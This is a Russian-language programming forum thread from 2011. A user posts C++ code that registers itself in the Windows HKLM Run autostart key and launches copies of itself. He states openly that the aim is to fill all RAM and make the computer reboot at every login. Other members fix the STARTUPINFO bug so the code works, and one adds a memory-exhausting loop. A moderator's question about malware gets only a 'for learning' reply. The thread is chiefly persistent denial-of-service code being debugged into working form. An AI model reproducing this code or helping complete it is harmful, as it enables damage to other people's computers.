Форум программистов, компьютерный форум CyberForum.ru

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Илларион
8 / 8 / 0
Регистрация: 05.06.2011
Сообщений: 97
#1

Неполучается создать процесс - C++

27.08.2011, 13:03. Просмотров 883. Ответов 15
Метки нет (Все метки)

Привет! Такая проблема возникла. В Visual C++ 2010 неполучается создать процесс.
C++
1
CreateProcess(argv[0],0,0,0,0,0,0,0,&sui,&pi);
Пишет, что Необработанное исключение в "0x77956dd0" в "!funny.exe": 0xC0000005: Нарушение прав доступа при чтении "0xcccccccc".
Причем dev C++ этот код отлично компилирует! Подскажите, пожалуйста, что сделать, чтобы и в Visual C++ он тоже работал. Заранее благодарю!
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
27.08.2011, 13:03     Неполучается создать процесс
Посмотрите здесь:

Создать процесс в консольной программе - C++
Здравствуйте, у меня вопрос как можно передать данные консольной программе из другой. Я так понимаю мне нужно создать процесс в этой...

Как создать процесс помимо основного? - C++
Как можно создать независимый процесс? К примеру: через каждые 4 секудны к переменной добавляется +1;

Как создать процесс от имени другого пользователя? - C++
Подскажите, как создать процесс от имени другого пользователя? PS Как создать токен, зная логин и пароль?

Как программно создать процесс, который создаёт окно консоли? - C++
Имеется ввиду, конечно настоящее отдельное окно консоли. Вот создаваемый процесс: #include <stdio.h> int main (){ printf ("Hello,...

Не создаётся процесс - C++
решил сделать так как написано сдесь https://msdn.microsoft.com/ru-ru/library/ms682499(v=vs.85).aspx но как только запускаю (что с...

Внедрение в процесс - C++
я знаю всего 2 способа как перехватить api dll. 1. это поменять код исполняемой dll. 2. или поменять таблицу импорта в исполняемом...

После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
lolopolosko
1354 / 312 / 5
Регистрация: 21.11.2009
Сообщений: 992
27.08.2011, 13:26     Неполучается создать процесс #2
Попробуйте запустить ВС++ с правами админа
Илларион
8 / 8 / 0
Регистрация: 05.06.2011
Сообщений: 97
27.08.2011, 13:27  [ТС]     Неполучается создать процесс #3
Пробовал - ничего не поменялось. Как была ошибка, так она и есть
grizlik78
Эксперт С++
1903 / 1435 / 109
Регистрация: 29.05.2011
Сообщений: 2,990
27.08.2011, 13:39     Неполучается создать процесс #4
Вообще, 0xCCCCCCCC намекает на неинициализированную переменную. Большего без кода сказать трудно.
Илларион
8 / 8 / 0
Регистрация: 05.06.2011
Сообщений: 97
27.08.2011, 13:41  [ТС]     Неполучается создать процесс #5
Ок, выкладываю все.
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include "stdafx.h"
#include <iostream>
#include <Windows.h>
#include <WinError.h>
 
using namespace std;
 
int _tmain(int argc, _TCHAR* argv[])
{
    STARTUPINFO sui;
    PROCESS_INFORMATION pi;
    HKEY hKey = HKEY_LOCAL_MACHINE; 
    wchar_t *sKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    LONG a = RegCreateKeyEx(hKey, 
                     sKey, 
                     NULL, 
                     NULL, 
                     REG_OPTION_NON_VOLATILE, 
                     KEY_SET_VALUE, 
                     NULL, 
                     &hKey, 
                     NULL); 
    if(a==ERROR_SUCCESS)
    {
      cout << "ura!" <<endl;
      // system("PAUSE");
      
    }
    else
    {
      cout << "bat! " << a << endl;
      //system("PAUSE");
    }
    TCHAR buffer[MAX_PATH];
    GetModuleFileName(NULL, buffer,MAX_PATH + 1);
    RegSetValueEx(hKey,L"MY",0,REG_SZ,(PBYTE)buffer,2*wcslen(buffer)+1);
    RegCloseKey(hKey);
    //while(1){
        CreateProcess(argv[0],0,0,0,0,0,0,0,&sui,&pi);
    //}
    
    return 0;
}
grizlik78
Эксперт С++
1903 / 1435 / 109
Регистрация: 29.05.2011
Сообщений: 2,990
27.08.2011, 13:46     Неполучается создать процесс #6
Ну вот попробуй перед CreateProcess сделать
C++
1
memset(&sui, 0, sizeof(sui));
А вообще, по хорошему, поля этой структуры надо заполнять перед вызовом.
Илларион
8 / 8 / 0
Регистрация: 05.06.2011
Сообщений: 97
27.08.2011, 14:35  [ТС]     Неполучается создать процесс #7
Спасибо, так заработало... Но эффект всё равно почему-то не тот... Должны создаваться бесчисленные экземпляры приложения и заполнить всю оперативку. А щас смотрю в диспетчер задач - процессы, а там только 2 или 3 экземпляра программы. Из-за чего это может быть?

Добавлено через 40 минут
Ещё хочу попросить, можете написать пример заполнения этой структуры с пояснениями. Заранее благодарю!
villu
202 / 202 / 4
Регистрация: 06.08.2011
Сообщений: 600
Записей в блоге: 1
27.08.2011, 15:49     Неполучается создать процесс #8
Цитата Сообщение от Илларион Посмотреть сообщение
Ещё хочу попросить, можете написать пример заполнения этой структуры с пояснениями.
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
grizlik78
Эксперт С++
1903 / 1435 / 109
Регистрация: 29.05.2011
Сообщений: 2,990
27.08.2011, 15:56     Неполучается создать процесс #9
Ну, минимально, пожалуй, стоит сделать
C++
1
2
memset(&sui, 0, sizeof(sui));
sui.cb = sizeof(sui);
Дальше поля можно заполнять по необходимости, не забывая выставлять соответствующий флаг. Ну а описания полей — да, в MSDN.
easybudda
Эксперт С++
9456 / 5469 / 927
Регистрация: 25.07.2009
Сообщений: 10,495
27.08.2011, 16:21     Неполучается создать процесс #10
Цитата Сообщение от Илларион Посмотреть сообщение
Должны создаваться бесчисленные экземпляры приложения и заполнить всю оперативку.
Напомню:
Запрещено размещать и обсуждать информацию, противоречащую законодательству Российской Федерации...
Правила форума
Отсюда вопрос - вредоносное ПО пишете?
alkagolik
Заблокирован
27.08.2011, 17:25     Неполучается создать процесс #11
это же очевидно. Видимо времени свободного много...
CyBOSSeR
Эксперт C++
2299 / 1669 / 86
Регистрация: 06.03.2009
Сообщений: 3,675
27.08.2011, 18:40     Неполучается создать процесс #12
Цитата Сообщение от grizlik78 Посмотреть сообщение
Ну, минимально, пожалуй, стоит сделать
C++
1
2
memset(&sui, 0, sizeof(sui));
sui.cb = sizeof(sui);
Так как cb первое поле структуры, то целесообразнее сделать так:
C++
1
STARTUPINFO si = { sizeof(STARTUPINFO) };
grizlik78
Эксперт С++
1903 / 1435 / 109
Регистрация: 29.05.2011
Сообщений: 2,990
27.08.2011, 18:44     Неполучается создать процесс #13
Ну да, согласен. Да и вообще инициализировать переменные правильнее как раз при объявлении.
kravam
быдлокодер
1691 / 878 / 44
Регистрация: 04.06.2008
Сообщений: 5,423
27.08.2011, 18:46     Неполучается создать процесс #14
Что вредоносоного в том, что заполнится вся оперативка? Я, например, был бы этому рад!
diagon
Higher
1927 / 1193 / 49
Регистрация: 02.05.2010
Сообщений: 2,925
Записей в блоге: 2
27.08.2011, 18:48     Неполучается создать процесс #15
Скушать оперативку можно и проще.
C++
1
2
while(true)
    new char[1000];
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
28.08.2011, 15:46     Неполучается создать процесс
Еще ссылки по теме:

Процесс в структуре - C++
Положил Popen в структуру. Как если процесс уничтожен, создать новый и положить в структуру. И еще, как сделать чтобы при инициализации...

Не создается процесс - C++
Вот часть задания: 1. Создать дочерний процесс Child (добавить к рабочей области еще один консольный вид проекта, при создании дочернего...

Циклический процесс - C++
Помогите пожалуйста. Вывести на экран следующую последовательность символов ******** ******* ****** ***** ****** ******* ...

Родительский и дочерний процесс - C++
Для начала код. ProcessA#include &lt;windows.h&gt; #include &lt;iostream&gt; #include &lt;stdio.h&gt; int main() { STARTUPINFO si;...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
Илларион
8 / 8 / 0
Регистрация: 05.06.2011
Сообщений: 97
28.08.2011, 15:46  [ТС]     Неполучается создать процесс #16
Цитата Сообщение от easybudda Посмотреть сообщение
вредоносное ПО пишете
Только для себя и только в качестве обучения.

Добавлено через 2 минуты
Цитата Сообщение от kravam Посмотреть сообщение
Что вредоносоного в том, что заполнится вся оперативка? Я, например, был бы этому рад!
У вас экстренно перезагрузится комп. А если эту прогу в реестр в автозагрузку засадить - то он будет постоянно перезагружатся после очередного входа в систему
Yandex
Объявления
28.08.2011, 15:46     Неполучается создать процесс
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru